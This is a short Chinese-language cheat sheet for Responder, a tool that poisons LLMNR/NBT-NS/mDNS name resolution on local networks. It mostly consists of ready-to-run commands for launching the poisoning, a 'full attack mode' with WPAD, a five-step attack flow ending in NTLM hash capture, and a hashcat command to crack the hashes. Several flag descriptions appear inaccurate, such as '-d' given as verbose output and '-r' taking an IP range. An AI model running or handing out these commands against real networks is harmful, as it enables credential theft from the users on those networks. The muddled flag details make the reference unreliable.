---
title: "Responder"
weight: 80
description: "LLMNR/NBT-NS 投毒工具"
date: "2026-03-24T16:29:46+08:00"
lastmod: "2026-03-24T16:29:46+08:00"
---

## Responder

Responder 是一款 LLMNR/NBT-NS/mDNS-NS 投毒工具，用于监听并响应本地名称解析请求。

## 基础使用

### 启动 Responder
```bash
responder -I eth0 -w -r -d -F
```

### 仅监听模式
```bash
responder -I eth0 -A
```

### 详细模式
```bash
responder -I eth0 -v
```

### 指定 IP 范围
```bash
responder -I eth0 -r 192.168.1.1-254
```

## 常用参数

| 参数 | 描述 |
|------|------|
| -I | 网络接口 |
| -A | 分析模式（仅监听） |
| -w | 启动 WPAD 代理 |
| -r | 响应服务名称查询 |
| -d | 启用详细输出 |
| -F | 强制响应 |
| -v | 详细模式 |

## 功能特性

- **LLMNR 投毒** - 监听本地名称解析
- **NBT-NS 投毒** - NetBIOS 名称投毒
- **WPAD 代理** - 自动代理发现
- **凭证捕获** - 捕获 NTLM 哈希
- **文件服务器** - 模拟 SMB 服务器

## 攻击流程

1. 启动 Responder 监听
2. 等待目标发起名称解析
3. Responder 响应并欺骗目标
4. 目标发送认证请求
5. 捕获 NTLM 哈希

## 使用示例

```bash
# 基本监听
responder -I eth0

# 分析模式（被动）
responder -I eth0 -A

# 完整攻击模式
responder -I eth0 -w -r -d

# 捕获凭证后破解
hashcat -m 5600 captured_hashes.txt wordlist.txt
```

## 参考资源

- [Responder GitHub](https://github.com/lgandx/Responder)